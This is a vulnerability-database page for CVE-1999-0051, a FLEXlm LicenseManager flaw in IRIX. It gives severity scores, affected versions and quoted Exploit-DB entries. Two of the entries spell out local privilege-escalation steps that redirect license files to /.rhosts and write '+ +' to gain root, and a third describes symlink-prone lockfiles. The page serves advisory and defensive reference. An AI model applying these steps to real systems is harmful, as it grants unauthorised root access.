CVE-1999-0051
published 1997-01-06CVE-1999-0051: Arbitrary file creation and program execution using FLEXlm LicenseManager, from versions 4.0 to 5.0, in IRIX.
PriorityP421high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.30%
66.8th percentile
Arbitrary file creation and program execution using FLEXlm LicenseManager, from versions 4.0 to 5.0, in IRIX.
Affected
49 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| globetrotter | flexlm | — | — |
| globetrotter | flexlm | — | — |
| globetrotter | flexlm | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
| sgi | irix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Solaris 2.5.1 - License Manager
exploitdb·1998-10-21
CVE-1999-0051 Solaris 2.5.1 - License Manager
Solaris 2.5.1 - License Manager
---
source: https://www.securityfocus.com/bid/461/info
The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularily. It follows symlinks.
bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd
And:
bash$ ls -l /var/tmp/.flexlm
total 2
Exploit-DB
SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation
exploitdb·1996-11-22
CVE-1999-0051 SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation
SGI IRIX 6.4 / SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/73/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrary manipulate root-owned files allowing root access.
% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &
Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore
Exploit-DB
SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Local Privilege Escalation
exploitdb·1996-04-05
CVE-1999-0051 SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Local Privilege Escalation
SGI IRIX 5.3/6.2 / SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Local Privilege Escalation
---
source: https://www.securityfocus.com/bid/72/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to
overwrite root-owned files allowing root access.
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &
Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in license version field put a space)
Apply
License(s) succesfully installed
% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +
If your sy
No writeups or analysis indexed.
1997-01-06
Published